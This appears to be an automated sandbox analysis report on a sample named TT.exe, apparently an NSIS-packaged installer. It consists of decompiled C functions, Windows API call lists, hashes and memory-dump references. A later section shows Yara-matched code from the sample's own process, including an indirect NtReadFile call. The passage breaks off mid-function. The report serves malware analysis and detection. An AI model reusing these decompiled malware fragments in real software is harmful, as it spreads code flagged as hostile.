                                                • API String ID: 2659869361-3936084776
                                                • Opcode ID: 7e3bd0a74015a4b4c7bd8f32b9337ec82444728bd267b6e5413a6877d2367a50
                                                • Instruction ID: d6a8f4146c737b4c1111608fba26ea94f920a63204c4a5504a78fba285be9fad
                                                • Opcode Fuzzy Hash: 7e3bd0a74015a4b4c7bd8f32b9337ec82444728bd267b6e5413a6877d2367a50
                                                • Instruction Fuzzy Hash: 2CD0A7721055307BD21237154C09ECF2A488F0230470A006BF541B6191C73C5C1187FE
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00405C59, Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 41COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E00405C59(CHAR* _a4) {
				CHAR* _t5;
				char* _t7;
				CHAR* _t9;
				char _t10;
				CHAR* _t11;
				void* _t13;

				_t11 = _a4;
				_t9 = CharNextA(_t11);
				_t5 = CharNextA(_t9);
				_t10 =  *_t11;
				if(_t10 == 0 ||  *_t9 != 0x3a || _t9[1] != 0x5c) {
					if(_t10 != 0x5c || _t11[1] != _t10) {
						L10:
						return 0;
					} else {
						_t13 = 2;
						while(1) {
							_t13 = _t13 - 1;
							_t7 = E00405BEB(_t5, 0x5c);
							if( *_t7 == 0) {
								goto L10;
							}
							_t5 = _t7 + 1;
							if(_t13 != 0) {
								continue;
							}
							return _t5;
						}
						goto L10;
					}
				} else {
					return CharNextA(_t5);
				}
			}









                                                0x00405c62
                                                0x00405c69
                                                0x00405c6c
                                                0x00405c6e
                                                0x00405c72
                                                0x00405c87
                                                0x00405ca6
                                                0x00000000
                                                0x00405c8e
                                                0x00405c90
                                                0x00405c91
                                                0x00405c94
                                                0x00405c95
                                                0x00405c9d
                                                0x00000000
                                                0x00000000
                                                0x00405c9f
                                                0x00405ca2
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00405ca2
                                                0x00000000
                                                0x00405c91
                                                0x00405c7f
                                                0x00000000
                                                0x00405c80

                                                APIs
                                                • CharNextA.USER32(?,?,C:\Users\user\AppData\Local\Temp\nse2C42.tmp,?,00405CC5,C:\Users\user\AppData\Local\Temp\nse2C42.tmp,C:\Users\user\AppData\Local\Temp\nse2C42.tmp,747DFA90,?,747DF560,00405A10,?,747DFA90,747DF560,00000000), ref: 00405C67
                                                • CharNextA.USER32(00000000), ref: 00405C6C
                                                • CharNextA.USER32(00000000), ref: 00405C80
                                                Strings
                                                • C:\Users\user\AppData\Local\Temp\nse2C42.tmp, xrefs: 00405C5A
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.341890292.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.341863679.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.341957776.0000000000408000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.341979389.000000000040A000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342024788.0000000000413000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342089403.0000000000422000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342138840.000000000042A000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342165521.000000000042D000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: CharNext
                                                • String ID: C:\Users\user\AppData\Local\Temp\nse2C42.tmp
                                                • API String ID: 3213498283-3182895846
                                                • Opcode ID: 822f20ec9a8b35058aaebb4724fdb7f7397eab756ad02150ec19b841d432d8ed
                                                • Instruction ID: 9a9653d8387983e914f74c1f8e9a863a5ef5a61ad4bce0684ac50a06ae96742d
                                                • Opcode Fuzzy Hash: 822f20ec9a8b35058aaebb4724fdb7f7397eab756ad02150ec19b841d432d8ed
                                                • Instruction Fuzzy Hash: 70F06291D0CF612BFB3256684C84B775E88CB55359F18407BDA80EA2C1C27C58808B9A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00403949, Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 20COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E00403949() {
				void* _t1;
				void* _t2;
				signed int _t11;

				_t1 =  *0x40a018; // 0x2c8
				if(_t1 != 0xffffffff) {
					CloseHandle(_t1);
					 *0x40a018 =  *0x40a018 | 0xffffffff;
				}
				_t2 =  *0x40a01c; // 0x2cc
				if(_t2 != 0xffffffff) {
					CloseHandle(_t2);
					 *0x40a01c =  *0x40a01c | 0xffffffff;
					_t11 =  *0x40a01c;
				}
				E004039A6();
				return E004059F0(_t11, "C:\\Users\\engineer\\AppData\\Local\\Temp\\nse2C42.tmp", 7);
			}






                                                0x00403949
                                                0x00403958
                                                0x0040395b
                                                0x0040395d
                                                0x0040395d
                                                0x00403964
                                                0x0040396c
                                                0x0040396f
                                                0x00403971
                                                0x00403971
                                                0x00403971
                                                0x00403978
                                                0x0040398a

                                                APIs
                                                • CloseHandle.KERNEL32(000002C8,C:\Users\user\AppData\Local\Temp\,00403780,?,?,00000007,00000009,0000000B), ref: 0040395B
                                                • CloseHandle.KERNEL32(000002CC,C:\Users\user\AppData\Local\Temp\,00403780,?,?,00000007,00000009,0000000B), ref: 0040396F
                                                Strings
                                                • C:\Users\user\AppData\Local\Temp\nse2C42.tmp, xrefs: 0040397F
                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 0040394E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.341890292.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.341863679.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.341957776.0000000000408000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.341979389.000000000040A000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342024788.0000000000413000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342089403.0000000000422000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342138840.000000000042A000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342165521.000000000042D000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: CloseHandle
                                                • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nse2C42.tmp
                                                • API String ID: 2962429428-1175612149
                                                • Opcode ID: 462e3e9a24158b25b8329b1cd15e1f965bb5a7db837425cedf417ff9a75e81db
                                                • Instruction ID: e7b4e10e42ecc32fc510515b664fd575b34ef2c347d966a0cc54db6954a3096e
                                                • Opcode Fuzzy Hash: 462e3e9a24158b25b8329b1cd15e1f965bb5a7db837425cedf417ff9a75e81db
                                                • Instruction Fuzzy Hash: 6AE08C71944B1896C130AF7CAD4E9953B1C9B413367244726F078F20F0C7789AA75AEE
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 004052C3, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 89%
                                                			E004052C3(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				int _t15;
				long _t16;

				_t15 = _a8;
				if(_t15 != 0x102) {
					if(_t15 != 0x200) {
						_t16 = _a16;
						L7:
						if(_t15 == 0x419 &&  *0x420d3c != _t16) {
							_push(_t16);
							_push(6);
							 *0x420d3c = _t16;
							E00404C7F();
						}
						L11:
						return CallWindowProcA( *0x420d44, _a4, _t15, _a12, _t16);
					}
					if(IsWindowVisible(_a4) == 0) {
						L10:
						_t16 = _a16;
						goto L11;
					}
					_t16 = E00404BFF(_a4, 1);
					_t15 = 0x419;
					goto L7;
				}
				if(_a12 != 0x20) {
					goto L10;
				}
				E004042F8(0x413);
				return 0;
			}





                                                0x004052c7
                                                0x004052d1
                                                0x004052ed
                                                0x0040530f
                                                0x00405312
                                                0x00405318
                                                0x00405322
                                                0x00405323
                                                0x00405325
                                                0x0040532b
                                                0x0040532b
                                                0x00405335
                                                0x00000000
                                                0x00405343
                                                0x004052fa
                                                0x00405332
                                                0x00405332
                                                0x00000000
                                                0x00405332
                                                0x00405306
                                                0x00405308
                                                0x00000000
                                                0x00405308
                                                0x004052d7
                                                0x00000000
                                                0x00000000
                                                0x004052de
                                                0x00000000

                                                APIs
                                                • IsWindowVisible.USER32(?), ref: 004052F2
                                                • CallWindowProcA.USER32 ref: 00405343
                                                  • Part of subcall function 004042F8: SendMessageA.USER32(00000000,00000000,00000000,00000000), ref: 0040430A
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.341890292.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.341863679.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.341957776.0000000000408000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.341979389.000000000040A000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342024788.0000000000413000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342089403.0000000000422000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342138840.000000000042A000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342165521.000000000042D000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: Window$CallMessageProcSendVisible
                                                • String ID:
                                                • API String ID: 3748168415-3916222277
                                                • Opcode ID: 267171b98df2b592aa392984fc350499d3aadededac15f67a9f8d07fb1712162
                                                • Instruction ID: 59df81840e01a834e8184741018ea8653580e9c1f0e113f815542439c818a584
                                                • Opcode Fuzzy Hash: 267171b98df2b592aa392984fc350499d3aadededac15f67a9f8d07fb1712162
                                                • Instruction Fuzzy Hash: 61017C71200608AFDF209F51DD81AAB3B66EB94394F50453BFA04761D1C7BA9C929F2D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00405CAE, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46stringCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 53%
                                                			E00405CAE(void* __eflags, intOrPtr _a4) {
				int _t11;
				signed char* _t12;
				intOrPtr _t18;
				intOrPtr* _t21;
				void* _t22;

				E00406228(0x422158, _a4);
				_t21 = E00405C59(0x422158);
				if(_t21 != 0) {
					E00406503(_t21);
					if(( *0x42475c & 0x00000080) == 0) {
						L5:
						_t22 = _t21 - 0x422158;
						while(1) {
							_t11 = lstrlenA(0x422158);
							_push(0x422158);
							if(_t11 <= _t22) {
								break;
							}
							_t12 = E0040659C();
							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
								E00405C07(0x422158);
								continue;
							} else {
								goto L1;
							}
						}
						E00405BC0();
						return 0 | GetFileAttributesA(??) != 0xffffffff;
					}
					_t18 =  *_t21;
					if(_t18 == 0 || _t18 == 0x5c) {
						goto L1;
					} else {
						goto L5;
					}
				}
				L1:
				return 0;
			}








                                                0x00405cba
                                                0x00405cc5
                                                0x00405cc9
                                                0x00405cd0
                                                0x00405cdc
                                                0x00405ce8
                                                0x00405ce8
                                                0x00405d00
                                                0x00405d01
                                                0x00405d08
                                                0x00405d09
                                                0x00000000
                                                0x00000000
                                                0x00405cec
                                                0x00405cf3
                                                0x00405cfb
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00405cf3
                                                0x00405d0b
                                                0x00000000
                                                0x00405d1f
                                                0x00405cde
                                                0x00405ce2
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00405ce2
                                                0x00405ccb
                                                0x00000000

                                                APIs
                                                  • Part of subcall function 00406228: lstrcpynA.KERNEL32(?,?,00000400,00403533,00423F40,NSIS Error,?,00000007,00000009,0000000B), ref: 00406235
                                                  • Part of subcall function 00405C59: CharNextA.USER32(?,?,C:\Users\user\AppData\Local\Temp\nse2C42.tmp,?,00405CC5,C:\Users\user\AppData\Local\Temp\nse2C42.tmp,C:\Users\user\AppData\Local\Temp\nse2C42.tmp,747DFA90,?,747DF560,00405A10,?,747DFA90,747DF560,00000000), ref: 00405C67
                                                  • Part of subcall function 00405C59: CharNextA.USER32(00000000), ref: 00405C6C
                                                  • Part of subcall function 00405C59: CharNextA.USER32(00000000), ref: 00405C80
                                                • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nse2C42.tmp,00000000,C:\Users\user\AppData\Local\Temp\nse2C42.tmp,C:\Users\user\AppData\Local\Temp\nse2C42.tmp,747DFA90,?,747DF560,00405A10,?,747DFA90,747DF560,00000000), ref: 00405D01
                                                • GetFileAttributesA.KERNEL32(C:\Users\user\AppData\Local\Temp\nse2C42.tmp,C:\Users\user\AppData\Local\Temp\nse2C42.tmp,C:\Users\user\AppData\Local\Temp\nse2C42.tmp,C:\Users\user\AppData\Local\Temp\nse2C42.tmp,C:\Users\user\AppData\Local\Temp\nse2C42.tmp,C:\Users\user\AppData\Local\Temp\nse2C42.tmp,00000000,C:\Users\user\AppData\Local\Temp\nse2C42.tmp,C:\Users\user\AppData\Local\Temp\nse2C42.tmp,747DFA90,?,747DF560,00405A10,?,747DFA90,747DF560), ref: 00405D11
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.341890292.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.341863679.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.341957776.0000000000408000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.341979389.000000000040A000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342024788.0000000000413000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342089403.0000000000422000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342138840.000000000042A000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342165521.000000000042D000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                • String ID: C:\Users\user\AppData\Local\Temp\nse2C42.tmp
                                                • API String ID: 3248276644-3182895846
                                                • Opcode ID: 8df147695d567d3479fd9fb611e01f2e4261d231372b324086cf0464a71b3f28
                                                • Instruction ID: 810c58eff44cea92ea74d6fc536401bd0fed09a955b2fb282e84a1b8880da462
                                                • Opcode Fuzzy Hash: 8df147695d567d3479fd9fb611e01f2e4261d231372b324086cf0464a71b3f28
                                                • Instruction Fuzzy Hash: 31F0F921109F5125E62232761D09B9F1E54CD97324745457FF8A1B23D2CB3C8853DD6D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0040610F, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44registryCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 90%
                                                			E0040610F(void* __ecx, void* __eflags, intOrPtr _a4, int _a8, char* _a12, char* _a16, signed int _a20) {
				int _v8;
				long _t21;
				long _t24;
				char* _t30;

				asm("sbb eax, eax");
				_v8 = 0x400;
				_t21 = E004060AE(__eflags, _a4, _a8,  ~_a20 & 0x00000100 | 0x00020019,  &_a20);
				_t30 = _a16;
				if(_t21 != 0) {
					L4:
					 *_t30 =  *_t30 & 0x00000000;
				} else {
					_t24 = RegQueryValueExA(_a20, _a12, 0,  &_a8, _t30,  &_v8);
					_t21 = RegCloseKey(_a20);
					_t30[0x3ff] = _t30[0x3ff] & 0x00000000;
					if(_t24 != 0 || _a8 != 1 && _a8 != 2) {
						goto L4;
					}
				}
				return _t21;
			}







                                                0x0040611d
                                                0x0040611f
                                                0x00406137
                                                0x0040613c
                                                0x00406141
                                                0x0040617e
                                                0x0040617e
                                                0x00406143
                                                0x00406155
                                                0x00406160
                                                0x00406166
                                                0x00406170
                                                0x00000000
                                                0x00000000
                                                0x00406170
                                                0x00406183

                                                APIs
                                                • RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,00000400,uvlcopdlxoed,00420530,?,?,?,00000002,uvlcopdlxoed,?,004063C4,80000002), ref: 00406155
                                                • RegCloseKey.ADVAPI32(?,?,004063C4,80000002,Software\Microsoft\Windows\CurrentVersion,uvlcopdlxoed,uvlcopdlxoed,uvlcopdlxoed,?,00420530), ref: 00406160
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.341890292.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.341863679.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.341957776.0000000000408000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.341979389.000000000040A000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342024788.0000000000413000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342089403.0000000000422000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342138840.000000000042A000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342165521.000000000042D000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: CloseQueryValue
                                                • String ID: uvlcopdlxoed
                                                • API String ID: 3356406503-3939465813
                                                • Opcode ID: 2abccbe21afdcf7b2969046f12d50590a05fc3777738c5024e31ebbb51756706
                                                • Instruction ID: a564c047acf5d73f9aa125f5b2549426a44a408a2c37113ac8a3848fd8f43ee5
                                                • Opcode Fuzzy Hash: 2abccbe21afdcf7b2969046f12d50590a05fc3777738c5024e31ebbb51756706
                                                • Instruction Fuzzy Hash: 8B015A72500209BBDF228F61CC0AFDB3BA8EF55364F01403AF95AA6191D678D964DBA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 004058C7, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E004058C7(CHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
				int _t7;

				0x422558->cb = 0x44;
				_t7 = CreateProcessA(0, _a4, 0, 0, 0, 0x4000000, 0, 0, 0x422558,  &_v20);
				if(_t7 != 0) {
					CloseHandle(_v20.hThread);
					return _v20.hProcess;
				}
				return _t7;
			}





                                                0x004058d0
                                                0x004058f0
                                                0x004058f8
                                                0x004058fd
                                                0x00000000
                                                0x00405903
                                                0x00405907

                                                APIs
                                                • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00422558,Error launching installer), ref: 004058F0
                                                • CloseHandle.KERNEL32(?), ref: 004058FD
                                                Strings
                                                • Error launching installer, xrefs: 004058DA
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.341890292.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.341863679.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.341957776.0000000000408000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.341979389.000000000040A000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342024788.0000000000413000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342089403.0000000000422000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342138840.000000000042A000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342165521.000000000042D000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: CloseCreateHandleProcess
                                                • String ID: Error launching installer
                                                • API String ID: 3712363035-66219284
                                                • Opcode ID: c3ebc3f9998ac015d8c7df4fd8e4914833f251e822556357c2f70f84276a4d27
                                                • Instruction ID: 5185fe82c3568d3c8632712b5ff5a6750f12376067ae41ef0f6fc1d41a32777d
                                                • Opcode Fuzzy Hash: c3ebc3f9998ac015d8c7df4fd8e4914833f251e822556357c2f70f84276a4d27
                                                • Instruction Fuzzy Hash: D6E0BFF4A00209BFEB109F64ED09F7B77ACEB04644F508425BE51F2150D77899658A78
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00405C07, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E00405C07(char* _a4) {
				char* _t3;
				char* _t5;

				_t5 = _a4;
				_t3 =  &(_t5[lstrlenA(_t5)]);
				while( *_t3 != 0x5c) {
					_t3 = CharPrevA(_t5, _t3);
					if(_t3 > _t5) {
						continue;
					}
					break;
				}
				 *_t3 =  *_t3 & 0x00000000;
				return  &(_t3[1]);
			}





                                                0x00405c08
                                                0x00405c12
                                                0x00405c14
                                                0x00405c1b
                                                0x00405c23
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00405c23
                                                0x00405c25
                                                0x00405c2a

                                                APIs
                                                • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402F5D,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\TT.exe,C:\Users\user\Desktop\TT.exe,80000000,00000003), ref: 00405C0D
                                                • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402F5D,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\TT.exe,C:\Users\user\Desktop\TT.exe,80000000,00000003), ref: 00405C1B
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.341890292.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.341863679.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.341957776.0000000000408000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.341979389.000000000040A000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342024788.0000000000413000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342089403.0000000000422000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342138840.000000000042A000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342165521.000000000042D000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: CharPrevlstrlen
                                                • String ID: C:\Users\user\Desktop
                                                • API String ID: 2709904686-3125694417
                                                • Opcode ID: 7cfe4fb9fb084f73e38b743788eacbc948a8cb50b3ca3a16f7beb83d38b7a1d7
                                                • Instruction ID: 741041d8a9fca0cd730fa631f59021aaf6e5318b071c559ffeb457c432b97b3b
                                                • Opcode Fuzzy Hash: 7cfe4fb9fb084f73e38b743788eacbc948a8cb50b3ca3a16f7beb83d38b7a1d7
                                                • Instruction Fuzzy Hash: 09D0C77241DA706EF70363149D05B9F6A48DF57700F1A44A6E581A6191C77C4C524BFD
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00405D26, Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E00405D26(void* __ecx, CHAR* _a4, CHAR* _a8) {
				int _v8;
				int _t12;
				int _t14;
				int _t15;
				CHAR* _t17;
				CHAR* _t27;

				_t12 = lstrlenA(_a8);
				_t27 = _a4;
				_v8 = _t12;
				while(lstrlenA(_t27) >= _v8) {
					_t14 = _v8;
					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
					_t15 = lstrcmpiA(_t27, _a8);
					_t27[_v8] =  *(_t14 + _t27);
					if(_t15 == 0) {
						_t17 = _t27;
					} else {
						_t27 = CharNextA(_t27);
						continue;
					}
					L5:
					return _t17;
				}
				_t17 = 0;
				goto L5;
			}









                                                0x00405d36
                                                0x00405d38
                                                0x00405d3b
                                                0x00405d67
                                                0x00405d40
                                                0x00405d49
                                                0x00405d4e
                                                0x00405d59
                                                0x00405d5c
                                                0x00405d78
                                                0x00405d5e
                                                0x00405d65
                                                0x00000000
                                                0x00405d65
                                                0x00405d71
                                                0x00405d75
                                                0x00405d75
                                                0x00405d6f
                                                0x00000000

                                                APIs
                                                • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405F81,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D36
                                                • lstrcmpiA.KERNEL32(00000000,00000000,?,00000000,00405F81,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D4E
                                                • CharNextA.USER32(00000000,?,00000000,00405F81,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D5F
                                                • lstrlenA.KERNEL32(00000000,?,00000000,00405F81,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D68
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.341890292.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.341863679.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.341957776.0000000000408000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.341979389.000000000040A000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342024788.0000000000413000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342089403.0000000000422000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342138840.000000000042A000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342165521.000000000042D000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: lstrlen$CharNextlstrcmpi
                                                • String ID:
                                                • API String ID: 190613189-0
                                                • Opcode ID: 2d92a05f35b020f23b5ffca9bb537fc612b2b61cfc11000e71e0c2b875cbb8c3
                                                • Instruction ID: 00b114ba7cac9785f06d25343f2ff2c8ce87c9cf7580b170eb884579fc1bcc0a
                                                • Opcode Fuzzy Hash: 2d92a05f35b020f23b5ffca9bb537fc612b2b61cfc11000e71e0c2b875cbb8c3
                                                • Instruction Fuzzy Hash: 45F0F631100818BFCB02DFA4CD04D9EBBA8EF55354B2580BBE840FB210D634DE01AFA9
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Analysis Process: TT.exe PID: 6624 Parent PID: 6588 TT.exeCOMMON

                                                Executed Functions

                                                Function 00419E0A, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 38filenativeCOMMON
                                                Download Yara Rule
                                                APIs
                                                • NtReadFile.NTDLL(BMA,5EB6522D,FFFFFFFF,00414A01,?,?,BMA,?,00414A01,FFFFFFFF,5EB6522D,00414D42,?,00000000), ref: 00419E55
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.392835395.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: FileRead
                                                • String ID: BMA$BMA
                                                • API String ID: 2738559852-2163208940
                                                • Opcode ID: 6663b026e105d7f6853f4d559d4a456aafc6f28bb1ddccbe58ecaba56839d856
                                                • Instruction ID: 397840b7226cff0a8c2a273405c0de42f80a15c4c86648141e34fcbd4ab4520d
                                                • Opcode Fuzzy Hash: 6663b026e105d7f6853f4d559d4a456aafc6f28bb1ddccbe58ecaba56839d856
                                                • Instruction Fuzzy Hash: 7EF0E2B6200108ABDB04DFA9DC80EEB77A9FF8C354F058649FA0DA7255D630E8518BA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00419E10, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36filenativeCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 37%
                                                			E00419E10(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
				void* _t18;
				void* _t27;
				intOrPtr* _t28;

				_t13 = _a4;
				_t28 = _a4 + 0xc48;
				E0041A960(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t6 =  &_a32; // 0x414d42
				_t12 =  &_a8; // 0x414d42
				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36, _a40); // executed
				return _t18;
			}






                                                0x00419e13
                                                0x00419e1f
                                                0x00419e27
                                                0x00419e32
                                                0x00419e4d
                                                0x00419e55
                                                0x00419e59

                                                APIs
                                                • NtReadFile.NTDLL(BMA,5EB6522D,FFFFFFFF,00414A01,?,?,BMA,?,00414A01,FFFFFFFF,5EB6522D,00414D42,?,00000000), ref: 00419E55
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.392835395.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: FileRead
                                                • String ID: BMA$BMA
                                                • API String ID: 2738559852-2163208940
                                                • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                • Instruction ID: bd248b349f18b2ced93d1e709abaf342431bbeaaaaa26160fd0c904447d41470
                                                • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                • Instruction Fuzzy Hash: 45F0B7B2210208AFCB14DF89DC81EEB77ADEF8C754F158649BE1DA7241D630E851CBA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0040ACD0, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E0040ACD0(void* _a4, intOrPtr _a8) {
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t15;
				struct _OBJDIR_INFORMATION _t17;
				struct _OBJDIR_INFORMATION _t18;
				void* _t30;
				void* _t31;
				void* _t32;

				_v8 =  &_v536;
				_t15 = E0041C650( &_v12, 0x104, _a8);
				_t31 = _t30 + 0xc;
				if(_t15 != 0) {
					_t17 = E0041CA70(__eflags, _v8);
					_t32 = _t31 + 4;
					__eflags = _t17;
					if(__eflags != 0) {
